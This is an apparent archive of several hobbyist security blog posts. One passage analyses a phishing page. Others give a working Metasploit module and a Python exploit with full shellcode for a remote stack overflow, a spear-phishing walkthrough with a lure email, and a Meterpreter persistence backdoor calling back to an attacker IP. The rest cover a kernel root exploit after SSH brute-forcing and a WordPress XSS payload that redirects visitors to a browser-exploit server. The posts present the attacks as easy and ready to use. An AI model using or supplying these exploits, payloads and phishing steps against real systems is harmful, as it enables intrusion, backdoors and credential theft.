<a href="http://3.bp.blogspot.com/-mN9DKRm4SYM/T31COa0m-4I/AAAAAAAAAGk/LeIhreqH850/s1600/original_poste_website.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="388" src="http://3.bp.blogspot.com/-mN9DKRm4SYM/T31COa0m-4I/AAAAAAAAAGk/LeIhreqH850/s640/original_poste_website.JPG" width="640" /></a></div>
<br />
One thing to notice is the year of expiration date that still use 2011, this mean that the html page was created the past year and they haven't updated yet.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-SVN4MVASl9Y/T3sBn8mLLHI/AAAAAAAAAF0/hnIEHNGF72U/s1600/fake_page_2011.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-SVN4MVASl9Y/T3sBn8mLLHI/AAAAAAAAAF0/hnIEHNGF72U/s1600/fake_page_2011.JPG" /></a></div>
<br />
Where are sent this information ?<br />
<br />
To find out we open our fake page with an editor like notepad++ and there are two lines, one regarding the copyright and the other one is kinda funny because tell you that the source code is not available.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Fnu4qRgLtHg/T3rI6deiJII/AAAAAAAAAFU/pmi0BFisQ3c/s1600/notepad_sourcecode1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="328" src="http://4.bp.blogspot.com/-Fnu4qRgLtHg/T3rI6deiJII/AAAAAAAAAFU/pmi0BFisQ3c/s640/notepad_sourcecode1.JPG" width="640" /></a></div>
<br />
If you scroll down you see at the end of the page there are few lines of html with obfuscated javascript<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-GmfZRHd559E/T3rJp0JOSpI/AAAAAAAAAFc/D6QwE1ajonY/s1600/notepad_sourcecode2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://3.bp.blogspot.com/-GmfZRHd559E/T3rJp0JOSpI/AAAAAAAAAFc/D6QwE1ajonY/s640/notepad_sourcecode2.jpg" width="640" /></a></div>
<br />
The code has been converted from ASCII to hexadecimal and to reverse the process it uses a javascript function called unescape.<br />
<br />
Once decoded the most important thing to do was to find the "collector site" that must be the value of the action attribute of form tag.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-gr8PAvRHT_I/T3r7nb_C3NI/AAAAAAAAAFk/SUUlNbub7ck/s1600/notepad_sourcecode4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-gr8PAvRHT_I/T3r7nb_C3NI/AAAAAAAAAFk/SUUlNbub7ck/s1600/notepad_sourcecode4.jpg" /></a></div>
<br />
The downloaded page will perform a POST request to <b>gogeamitu.com/soso/system.php</b> with all the sensitive information. This php script can act in several ways, but what i think is it can do one of this things:<br />
<ul>
<li>Stores the information in the database of the same server</li>
<li>Send the information to a remote database or to another web page</li>
<li>Send an email to spammers with all information </li>
</ul>
<br />
To know if this site has been compromised or is the server of the spammer we take a look to the domain through a whois service (like the previous).<br />
<br />
Domain details:<br />
<ul>
<li>Record created 21 February 2012</li>
<li>Record expire 21 February 2013</li>
<li>Registration service provider: Aruba S.p.A.</li>
</ul>
<div>
Again some details are omitted and also in this case the owner details are fully visible. This domain has been registered only one month ago but this time is linked so i can check the webchace of various search engines.<br />
<br />
Current home page.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-tmwQDw-1b3I/T3t0MwPwUSI/AAAAAAAAAGU/_k0fVkoFDIk/s1600/this_is_not_possible.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="75" src="http://4.bp.blogspot.com/-tmwQDw-1b3I/T3t0MwPwUSI/AAAAAAAAAGU/_k0fVkoFDIk/s400/this_is_not_possible.JPG" width="400" /></a></div>
<br />
I found the cached page only on google and was taken the 28 of march, this is too far from the register date to say that has never been chaged. Another interesting thing is the domain name <b>gogeamitu</b> which is the name of an old Romanian boxer <a href="http://en.wikipedia.org/wiki/Gogea_Mitu">Gogea Mitu</a>, maybe this is a clue about spammers nationality ?<br />
<br />
Visible content of system.php is down here and it is composed by only one line that redirect the victim to poste.it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-0TIh09joB7Y/T3r9MW8-oDI/AAAAAAAAAFs/uy6aBldls3s/s1600/redirect_poste.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-0TIh09joB7Y/T3r9MW8-oDI/AAAAAAAAAFs/uy6aBldls3s/s1600/redirect_poste.JPG" /></a></div>
<br />
In my opinion spammers have payed one person to use his personal information to register gogeamitu and store (*) in this server all victims details, maybe once a day they retrieve the data and clean the db.<br />
<br />
* After doing other reasearch on others phishing emails he (i'm quite sure is only one person) doesn't store the information to the db, but send an email to his personal address.Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com0tag:blogger.com,1999:blog-3423828846307461333.post-88407572321873129772012-03-13T19:51:00.000+01:002012-04-05T09:25:40.752+02:00Build Metasploit Module (Windows Exploit Development)This is the continuation of my previous post <a href="http://security-obscurity.blogspot.com/2012/02/windows-exploit-development-remote.html">Windows Exploit Development (Remote Stack BoF</a>).<br />
<br />
Let's try to convert the standalone exploit for vserver to a metasploit module. If you think that this task is complicated you're wrong because what we need, is only a template taken from <a href="http://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/">this</a> corelan tutorial and edit few things.<br />
<br />
What we edit:<br />
<ul>
<li>Information details.</li>
<li>How much space we have for the shellcode (2062 bytes).</li>
<li>Bad chars.</li>
<li>Target machine, return address and offset.</li>
</ul>
<pre class="brush: rails">require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Vserver remote bof',
'Description' => %q{this is a description},
'Author' => [ 'SecurityObscurity' ],
'Version' => '$Revision: 1 $',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 2062,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
['Windows 2003 Server R2 SP2',
{ 'Ret' => 0x77384281, 'Offset' => 54 } ],
],
'DefaultTarget' => 0,
'Privileged' => false ))
register_options(
[
Opt::RPORT(15000)
], self.class)
end
def exploit
connect
junk = make_nops(target['Offset'])
eip = [target.ret].pack('V')
nops = make_nops(50)
shellcode = payload.encoded
sock.put(junk+eip+nops+shellcode)
handler
disconnect
end
end</pre>
Once finished editing we move the script in a metasploit subfolder (the most appropriate) and then we start metasploit. If once started we don't see errors it means that the module was loaded successfully.<br />
<br />
Now it's time to use it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-t2b87fLTG4Q/T18XY_LIsvI/AAAAAAAAAEY/1YkKH8AdrE4/s1600/metasploit_module_use.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-t2b87fLTG4Q/T18XY_LIsvI/AAAAAAAAAEY/1YkKH8AdrE4/s1600/metasploit_module_use.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-_CBkWZZorjs/T18Wu2O4TeI/AAAAAAAAAEQ/MeCcB_geQnA/s1600/metasploit_module_options.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="399" src="http://1.bp.blogspot.com/-_CBkWZZorjs/T18Wu2O4TeI/AAAAAAAAAEQ/MeCcB_geQnA/s640/metasploit_module_options.jpg" width="640" /></a></div>
<br />
After setting up remote host and payload we launch the exploit to see if it works.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-BElhNflJmLA/T18YPlefeVI/AAAAAAAAAEo/pHmitxzhwHM/s1600/metasploit_module_exploit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="http://1.bp.blogspot.com/-BElhNflJmLA/T18YPlefeVI/AAAAAAAAAEo/pHmitxzhwHM/s640/metasploit_module_exploit.jpg" width="640" /></a></div>
<br />
It works !<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/bvI541y4gFI" width="640"></iframe><br />
<br />
As you can see is very easy to convert a standalone exploit to a metasploit module.<br />
<br />
Reference:<br />
<div style="text-align: left;">
- <a href="http://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/">Exploit writing tutorial part 4: From Exploit to Metasploit - The Basics</a></div>Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com0tag:blogger.com,1999:blog-3423828846307461333.post-80906285207050423292012-02-01T09:30:00.002+01:002020-11-22T19:27:50.007+01:00Windows Exploit Development Remote Stack BoFThis time i made a video about basic exploit development process on windows. The target machine is a Windows Server 2003 R2 with DEP disabled running a vulnerable software called vserver.<br />
<br />
Basically the vulnerable software is listening on TCP port 15000 waiting for some input and if you provide a string bigger than 15 characters it will crash.<br />
<br />
Here is vserver:<br />
- <a href="http://www.mediafire.com/?89haasml4vxhm0z">vserver download</a><br />
<br />
Exploit code:<br />
<pre class="brush:py;"><span style="font-size: x-small;">#!/usr/bin/python
#
import socket
junk = b'A' * 54
eip = b'\x81\x42\x38\x77'
nops = b'\x90' * 25
shellcode = b'\xbe\xb6\x17\xb0\xd8\xdd\xc0\xd9\x74\x24\xf4\x58\x33\xc9'
shellcode += b'\xb1\x4f\x83\xc0\x04\x31\x70\x10\x03\x70\x10\x54\xe2\x4c'
shellcode += b'\x30\x11\x0d\xad\xc1\x41\x87\x48\xf0\x53\xf3\x19\xa1\x63'
shellcode += b'\x77\x4f\x4a\x08\xd5\x64\xd9\x7c\xf2\x8b\x6a\xca\x24\xa5'
shellcode += b'\x6b\xfb\xe8\x69\xaf\x9a\x94\x73\xfc\x7c\xa4\xbb\xf1\x7d'
shellcode += b'\xe1\xa6\xfa\x2f\xba\xad\xa9\xdf\xcf\xf0\x71\xde\x1f\x7f'
shellcode += b'\xc9\x98\x1a\x40\xbe\x12\x24\x91\x6f\x29\x6e\x09\x1b\x75'
shellcode += b'\x4f\x28\xc8\x66\xb3\x63\x65\x5c\x47\x72\xaf\xad\xa8\x44'
shellcode += b'\x8f\x61\x97\x68\x02\x78\xdf\x4f\xfd\x0f\x2b\xac\x80\x17'
shellcode += b'\xe8\xce\x5e\x92\xed\x69\x14\x04\xd6\x88\xf9\xd2\x9d\x87'
shellcode += b'\xb6\x91\xfa\x8b\x49\x76\x71\xb7\xc2\x79\x56\x31\x90\x5d'
shellcode += b'\x72\x19\x42\xfc\x23\xc7\x25\x01\x33\xaf\x9a\xa7\x3f\x42'
shellcode += b'\xce\xd1\x1d\x0b\x23\xef\x9d\xcb\x2b\x78\xed\xf9\xf4\xd2'
shellcode += b'\x79\xb2\x7d\xfc\x7e\xb5\x57\xb8\x11\x48\x58\xb8\x38\x8f'
shellcode += b'\x0c\xe8\x52\x26\x2d\x63\xa3\xc7\xf8\x23\xf3\x67\x53\x83'
shellcode += b'\xa3\xc7\x03\x6b\xae\xc7\x7c\x8b\xd1\x0d\x0b\x8c\x46\x6e'
shellcode += b'\xa4\x10\x92\x06\xb7\x14\x31\xfb\x3e\xf2\x23\x14\x17\xad'
shellcode += b'\xdb\x8d\x32\x25\x7d\x51\xe9\xad\x1e\xc0\x76\x2d\x68\xf9'
shellcode += b'\x20\x7a\x3d\xcf\x38\xee\xd3\x76\x93\x0c\x2e\xee\xdc\x94'
shellcode += b'\xf5\xd3\xe3\x15\x7b\x6f\xc0\x05\x45\x70\x4c\x71\x19\x27'
shellcode += b'\x1a\x2f\xdf\x91\xec\x99\x89\x4e\xa7\x4d\x4f\xbd\x78\x0b'
shellcode += b'\x50\xe8\x0e\xf3\xe1\x45\x57\x0c\xcd\x01\x5f\x75\x33\xb2'
shellcode += b'\xa0\xac\xf7\xc2\xea\xec\x5e\x4b\xb3\x65\xe3\x16\x44\x50'
shellcode += b'\x20\x2f\xc7\x50\xd9\xd4\xd7\x11\xdc\x91\x5f\xca\xac\x8a'
shellcode += b'\x35\xec\x03\xaa\x1f'
sploit = junk + eip + nops + shellcode
print('[+] Data length: ' + str(len(sploit)) + ' bytes')
print('[+] Sending...\n')
print( sploit )
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect(('192.168.2.9',15000))
s.send( sploit )
s.close()
print('\n[+] Ok')</span></pre>
I don't go into details because there is already an awesome tutorial made by corelanc0d3r that explain perfectly the process of building a stack based overflow exploit.<br />
<br />
You can find his tutorial <a href="https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/">here</a>.<br />
<br />
Enjoy the video.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/ekazS--EYfM" width="640"></iframe><br />
<br />
~SecurityObscurity<br />
<br />
Reference:<br />
- <a href="https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/">Corelan Exploit Stack Based Overflows</a>Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com0tag:blogger.com,1999:blog-3423828846307461333.post-47291758783632873302012-01-01T11:31:00.000+01:002012-04-05T09:26:58.770+02:00Foxit Reader PDF Exploit + Windows 7 BackdoorThis video show you how it is easy to install a backdoor (Meterpreter Service) on a Windows 7 pc throught a pdf and with the support of metasploit.<br />
<br />
Our victim uses an outdated version of Foxit Reader (4.1.1) which is vulnerable to a <a href="http://www.exploit-db.com/exploits/15532/">stack-based buffer overflow</a>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt16000/sudo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br />
<img border="0" height="297" src="http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt16000/sudo.png" width="400" /></a></div>
<br />
Our goal is to install a backdoor on the victim's machine so we can access every time we want, to accomplish this thing we will use a bit of social engineering and a malicious pdf.<br />
<br />
First of all we open SET and select the type of attack, in this case will be a Spear-Phishing attack that allows you to specially craft email messages and send them to a large (or small) number fo people with attached fileformat malicious payload. Our exploit will be Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow with a windows meterpreter reverse https payload set on port 44333.<br />
<br />
The next step is to craft our e-mail telling that something unusual comes from his computer. <br />
<br />
E-mail text: <i> </i><br />
<blockquote class="tr_bq">
<i>Dear Frank Victim, </i><br />
<br />
<i>To find out what happens to your computer run foxit reader as administrator and open Network Problems.pdf. </i><br />
<br />
<i>Best Regards.</i></blockquote>
Now it's time to send the email.<br />
<br />
When Frank opens the pdf a meterpreter session is created but with user privileges; to become local system we need to use the powerfull script <b>getsystem</b><br />
<br />
<pre class="brush:plain;">meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t The technique to use. (Default to '0').
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
4 : Exploit - KiTrap0D (In Memory/User)</pre>
<br />
This script tries with one or all techniques described above to elevate your privilege from user to local system so we can install the backdoor.<br />
<br />
Our backdoor is a virtual basic script that as payload has a reverse tcp shell.<br />
<br />
<pre class="brush:plain;">meterpreter > run persistence -h
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back</pre>
If all went well after a reboot the backdoor will try to reconnect each 30 seconds.<br />
<pre class="brush:plain;">meterpreter > run persistence -U -i 30 -p 44332 -r 192.168.2.21</pre>
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/rAiAntoUwT4" width="640"></iframe><br />
As you can see it is very easy.<br />
<br />
Reference:<br />
- <a href="http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training">Metasploit Unleashed</a>Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com3tag:blogger.com,1999:blog-3423828846307461333.post-12542018647758410982011-12-07T22:36:00.000+01:002012-04-04T23:58:19.907+02:00Ubuntu Server Exploit (Local Privilege Escalation)Today we're gonna talk about an "old" vulnerability discovered by Dan Rosenberg in the linux kernel. This bug affect versions previous than 2.6.38 and permit to an user with low privileges to gain root access.<br />
<br />
Link to exploit:<a href="http://www.exploit-db.com/exploits/15704/"> Linux Kernel<= 2.6.37 Local Privilege Escalation</a><br />
<br />
<div align="CENTER">
<a href="http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt16000/screen-shot-2010-12-07-at-72005-pm.png"><img align="BOTTOM" border="0" height="284" name="immagini1" src="http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt16000/screen-shot-2010-12-07-at-72005-pm.png" width="400" /></a></div>
<br />
The text below is taked from exploit description.<br />
<pre class="brush: plain">* This exploit leverages three vulnerabilities to get root, all of which were
* discovered by Nelson Elhage:
*
* CVE-2010-4258
* -------------
* This is the interesting one, and the reason I wrote this exploit. If a
* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
* word will be written to a user-specified pointer when that thread exits.
* This write is done using put_user(), which ensures the provided destination
* resides in valid userspace by invoking access_ok(). However, Nelson
* discovered that when the kernel performs an address limit override via
* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
* etc.), this override is not reverted before calling put_user() in the exit
* path, allowing a user to write a NULL word to an arbitrary kernel address.
* Note that this issue requires an additional vulnerability to trigger.
*
* CVE-2010-3849
* -------------
* This is a NULL pointer dereference in the Econet protocol. By itself, it's
* fairly benign as a local denial-of-service. It's a perfect candidate to
* trigger the above issue, since it's reachable via sock_no_sendpage(), which
* subsequently calls sendmsg under KERNEL_DS.
*
* CVE-2010-3850
* -------------
* I wouldn't be able to reach the NULL pointer dereference and trigger the
* OOPS if users weren't able to assign Econet addresses to arbitrary
* interfaces due to a missing capabilities check.</pre>
<br />
<div style="text-align: center;">
<span style="font-size: large;"><b>VIDEO</b> </span><span style="font-size: large;"><b>EXAMPLE</b></span></div>
<div style="text-align: left;">
<b>Scenario:</b></div>
<div style="text-align: left;">
<b>- Victim: </b>awesomeforum.dot (with ubuntu server 10.04 kernel 2.6.32 )</div>
<div style="text-align: left;">
- <b>Attacker: </b>192.168.2.13 (with backbox 2)</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
This forum has installed the lastest version of phpBB3 cms so there is no way to take advantage of some flaws.<br />
<br />
<div style="text-align: left;">
To start we check the name of the forum administrator and if we are lucky will be the same for the ssh account. This time we are lucky and after a simple bruteforce attack with hydra we got john's password.<br />
<br /></div>
<div style="text-align: left;">
After the successfull attack we login and we try to see if the kernel version is vulnerable and if there is gcc (by default all linux distribution has it ). Now it's time to upload the exploit throught sftp and execute it. After got the root account we can inject javascript code in some phpbb3 files to spread malware as few months ago has happened to mysql.com or just install a rootkit.</div>
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/Ia6OJAP-KS0" width="640"></iframe></div>Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com0tag:blogger.com,1999:blog-3423828846307461333.post-35205920031629781272011-11-06T19:38:00.000+01:002012-04-05T09:28:51.828+02:00Have fun with scammers<div class="separator" style="clear: both; display: none; text-align: center;">
<a href="http://4.bp.blogspot.com/-i4Y6_wb0aR8/TvmUm0YZ5zI/AAAAAAAAAC4/yegWuxCwKXQ/s1600/umadbro.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-i4Y6_wb0aR8/TvmUm0YZ5zI/AAAAAAAAAC4/yegWuxCwKXQ/s1600/umadbro.jpg" /></a></div>
A couple of days ago i've received this e-mail:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-L54sy-LDYZ0/TrbS8SrIXBI/AAAAAAAAACE/fweHcbyIfck/s1600/1_obs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-L54sy-LDYZ0/TrbS8SrIXBI/AAAAAAAAACE/fweHcbyIfck/s1600/1_obs.jpg" /></a></div>
<br />
After reading it i decided to go on and have some fun with him so i've replied and after one day i get the response.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-EAbgCI_2fR4/TrLsZhmwgxI/AAAAAAAAABM/mIX2NbGe2nw/s1600/2_obs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-EAbgCI_2fR4/TrLsZhmwgxI/AAAAAAAAABM/mIX2NbGe2nw/s1600/2_obs.jpg" /></a></div>
<br />
To convince me he attached four pictures regarding the flat. Here is the living room and my future bedroom.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-COVGD7RNpJY/Tra-q07MfKI/AAAAAAAAABk/FbFvt_3jcZY/s1600/bedroom3.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"> <img border="0" src="http://3.bp.blogspot.com/-COVGD7RNpJY/Tra-q07MfKI/AAAAAAAAABk/FbFvt_3jcZY/s1600/bedroom3.jpg" /></a><a href="http://1.bp.blogspot.com/-93ndGhJkl18/Tra9c9HgeAI/AAAAAAAAABc/pJAprsNtAWs/s1600/Living+Room.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-93ndGhJkl18/Tra9c9HgeAI/AAAAAAAAABc/pJAprsNtAWs/s1600/Living+Room.jpg" /></a></div>
<br />
<br />
Anyone can see that this picture is from a five stars hotel but to be really sure i used google search by image and what i found ? that these images are from an hotel in the center of Milan.<br />
<br />
Things are getting interesting so i decided to know how can i get this awesome flat.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-XmGBZU4DDvg/TrbBompHnQI/AAAAAAAAABs/JKU6egdzunk/s1600/3_obs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-XmGBZU4DDvg/TrbBompHnQI/AAAAAAAAABs/JKU6egdzunk/s1600/3_obs.jpg" /></a></div>
<br />
His response.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-vO9iY2Bk8SU/TrbDBLUmF9I/AAAAAAAAAB0/JFQ5BOU7es8/s1600/4_obs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-vO9iY2Bk8SU/TrbDBLUmF9I/AAAAAAAAAB0/JFQ5BOU7es8/s1600/4_obs.jpg" /></a></div>
<br />
Now it's time to send him my personal information in a pdf.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-rNlbrrZ5K60/TrbDLefY3TI/AAAAAAAAAB8/OnOnRJD5wwE/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-rNlbrrZ5K60/TrbDLefY3TI/AAAAAAAAAB8/OnOnRJD5wwE/s1600/5.jpg" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-KuXIwZxRp6A/Tra8eAsRB8I/AAAAAAAAABU/TKCpBTGFBe0/s1600/trollface.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="283" src="http://4.bp.blogspot.com/-KuXIwZxRp6A/Tra8eAsRB8I/AAAAAAAAABU/TKCpBTGFBe0/s320/trollface.jpg" width="320" /></a></div>
<br />
After this e-mail i haven't got any response, maybe he is angry with me but i don't know why :(.Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com1tag:blogger.com,1999:blog-3423828846307461333.post-32739380119308762672011-11-01T10:01:00.000+01:002012-04-04T23:57:23.374+02:00Wordpress XSS Vulnerability + IE 8 ExploitThe 30th December of 2010 a guy named sneak reported a <a href="http://www.sneaked.net/persistent-xss-vulnerability-wordpress-303-ksesphp">persistent XSS vulnerability</a> that affect the popular blog cms wordpress <= 3.0.3.<br />
<br />
The problem is located into the kses.php file which is the HTML sanitation library. If we type a link with the href attribute written in capital letters this library don't filter the content properly.<br />
<br />
Example:<br />
<pre class="brush: xhtml"><a HREF="javascript:alert(0)">CLICK HERE</a>
</pre>
<br />
If we post a comment this tag will be accepted as a common link. With this vulnerability we can craft a piece of code that can steal cookies, redirected to other sites etc....<br />
<br />
This video shows you how it can be easy for everyone to craft an evil comment to redirect the victim to a server where there is an exploit for Internet Explorer 8 (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3971">CVE-2010-3971</a>).<br />
<br />
Our evil code:<br />
<pre class="brush: js">var s = navigator.userAgent;
if( s.search('MSIE 8.0') != -1 ) {
window.location = "http://192.168.2.13:8080/news";
}
</pre>
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/BXmXEKfxZQc" width="640"></iframe><br />
<br />
Reference and more detailed information:<br />
- <a href="http://www.sneaked.net/">Sneak blog </a><br />
- <a href="http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training">Metasploit Unleashed</a><br />
- <a href="http://www.javascript-obfuscator.com/">Javascript Obfuscator</a>Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com2tag:blogger.com,1999:blog-3423828846307461333.post-19898818928678089862011-10-04T19:31:00.000+02:002012-04-04T23:56:22.271+02:00OsCommerce Malware InfectionThree months ago is started a huge site infection campaign with lens oscommerce, a famous cms for medium/little on-line stores. This cms suffers of few vulnerabilities that can lead an attacker to upload files and execute remote code.<br />
<br />
Vulnerabilities:<br />
- <a href="http://www.exploit-db.com/exploits/15587">osCommerce 2.2 Remote File Upload Vulnerability</a><br />
- <a href="http://www.exploit-db.com/exploits/16113">osCommerce authentication bypass</a><br />
- <a href="http://www.exploit-db.com/exploits/16899">osCommerce 2.2 Arbitrary PHP Code Execution</a><br />
- <a href="http://www.exploit-db.com/exploits/17285">osCommerce 2.3.1 Remote File Upload Vulnerability</a><br />
<br />
Today (4/10/2011) the total number of infected sites is 830,000 but two months ago was 8 million.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-dLank5iNuVE/TonulIsQthI/AAAAAAAAAA4/yjEGAkRjnE4/s1600/result_google.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="155" src="http://1.bp.blogspot.com/-dLank5iNuVE/TonulIsQthI/AAAAAAAAAA4/yjEGAkRjnE4/s640/result_google.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
In some compromised sites the attacker has left the webshell.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-7RmFDHR6O4o/ToY8pS_zhCI/AAAAAAAAAAw/AkR-2P72FJc/s1600/lista_img_obscured.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="290" src="http://2.bp.blogspot.com/-7RmFDHR6O4o/ToY8pS_zhCI/AAAAAAAAAAw/AkR-2P72FJc/s640/lista_img_obscured.jpg" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-4XgEbuxZDAU/ToY48iklDpI/AAAAAAAAAAs/RmrS7uoQJV8/s1600/img_shell_obscured.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="392" src="http://3.bp.blogspot.com/-4XgEbuxZDAU/ToY48iklDpI/AAAAAAAAAAs/RmrS7uoQJV8/s640/img_shell_obscured.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
After uploading a backdoor the attacker edit the home page and add a script/iframe tag that load multiple browser exploits.<br />
<br />
Exploits used:<br />
- <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003">IE 6 Remote Code Execution</a><br />
- <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840">Java Runtime Environment Remote Code Execution Vulnerability</a><br />
- <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885">Microsoft Windows Help</a><br />
- <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188">Adobe Reader and Acrobat 8.x</a><br />
<br />
After successful exploitation a malware is downloaded and executed.<br />
<br />
<div align="center">
<b><span style="font-size: x-large;">VIDEO EXAMPLE</span></b></div>
<br />
<b>Scenario:</b><br />
- 192.168.2.13 ----> Attacker with BackBox 2.0<br />
- 192.168.2.7/os/ -----> Victim with osCommerce 2.2<br />
- http://coolsite.dot ----> Malware host<br />
<br />
- jquery.js (IE 6 Remote Code Execution <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003">CVE-2006-0003</a>)<br />
- windows.exe (windows calculator with reverse meterpreter tcp payload)<br />
